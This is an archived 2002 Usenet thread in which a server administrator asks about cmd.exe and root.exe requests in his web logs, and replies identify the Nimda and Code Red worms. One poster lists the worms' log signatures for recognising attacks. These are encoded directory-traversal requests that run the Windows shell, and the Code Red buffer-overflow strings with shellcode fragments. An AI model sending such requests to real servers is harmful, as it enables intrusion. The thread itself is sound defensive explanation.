cmd.exe and root.exe in HTTP error files

cmd.exe and root.exe in HTTP error files

Post by Newse Surphe » Tue, 09 Apr 2002 21:52:55



Hi,

I seem to have quite a few errors in my http log files for certain IPs
looking for 'root.exe' and 'cmd.exe' in rather odd no existent directories
on my server.

Any ideas as to what this might be?

 
 
 

cmd.exe and root.exe in HTTP error files

Post by Eirik Se » Tue, 09 Apr 2002 22:08:20



>  Hi,

>  I seem to have quite a few errors in my http log files for certain IPs
>  looking for 'root.exe' and 'cmd.exe' in rather odd no existent directories
>  on my server.

>  Any ideas as to what this might be?

Nimda.

http://www.cert.org/advisories/CA-2001-26.html

- Eirik
--
New and exciting signature!

 
 
 

cmd.exe and root.exe in HTTP error files

Post by Patrick HERV » Wed, 10 Apr 2002 01:02:25


Nimda or Code Red


Quote:> Hi,

> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd no existent directories
> on my server.

> Any ideas as to what this might be?

 
 
 

cmd.exe and root.exe in HTTP error files

Post by p.. » Wed, 10 Apr 2002 05:03:19



Quote:> Hi,
> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd no existent directories
> on my server.
> Any ideas as to what this might be?

Nimda  ( a work that attacks IIS servers,others are not vulnerable)

--
Peter H?kanson        
        IPSec  Sverige      (At the Riverside of Gothenburg, home of Volvo)
           Sorry about my e-mail address, but i'm trying to keep spam out.
           Remove "icke-reklam" and it works.

 
 
 

cmd.exe and root.exe in HTTP error files

Post by Don Kellowa » Wed, 10 Apr 2002 13:53:31


For reference:

NIMDA WORM
When you see the following in a log file, it's indicative of various IP's
attempting to compromise the webserver with the NIMDA worm.
Visit http://www.cert.org/advisories/CA-2001-26.html for further
information...

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy
stem32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

CODE RED WORM
When you see the following in a log file, it's indicative of various IP's
attempting to compromise the webserver with the CODE RED worm.
Visit http://www.cert.org/advisories/CA-2001-19.html for further
information...

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a

CODE RED II WORM
When you see the following attempts in a log file, it's indicative of
various IP's attempting to compromise the webserver with the CODE RED II
worm.
Visit http://www.cert.org/incident_notes/IN-2001-09.html for further
information...

/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
0%u531b%u53ff%u0078%u0000%u00=a

--
Best Regards,
Don Kelloway
http://www.commodon.com

For *your* protection, visit http://www.commodon.com/threat to learn about
Back Orifice, NetBus, SubSeven and a few others.  All of which are "Threats
to Your Security on the Internet".


Quote:> Hi,

> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd no existent directories
> on my server.

> Any ideas as to what this might be?

 
 
 

cmd.exe and root.exe in HTTP error files

Post by Don Kellowa » Wed, 10 Apr 2002 14:04:29


NIMDA WORM
When you see the following in a log file, it's indicative of various IP's
attempting to compromise the webserver with the NIMDA worm.  Visit
http://www.cert.org/advisories/CA-2001-26.html for further information...

GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET
/msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy
stem32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

CODE RED WORM
When you see the following in a log file, it's indicative of various IP's
attempting to compromise the webserver with the CODE RED worm.  Visit
http://www.cert.org/advisories/CA-2001-19.html for further information...

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a

CODE RED II WORM
When you see the following attempts in a log file, it's indicative of
various IP's attempting to compromise the webserver with the CODE RED II
worm.  Visit http://www.cert.org/incident_notes/IN-2001-09.html for further
information...

/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%
u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b0
0%u531b%u53ff%u0078%u0000%u00=a

--
Best Regards,
Don Kelloway
http://www.commodon.com

For *your* protection, visit http://www.commodon.com/threat to learn about
Back Orifice, NetBus, SubSeven and a few others.  All of which are "Threats
to Your Security on the Internet".


Quote:> Hi,

> I seem to have quite a few errors in my http log files for certain IPs
> looking for 'root.exe' and 'cmd.exe' in rather odd no existent directories
> on my server.

> Any ideas as to what this might be?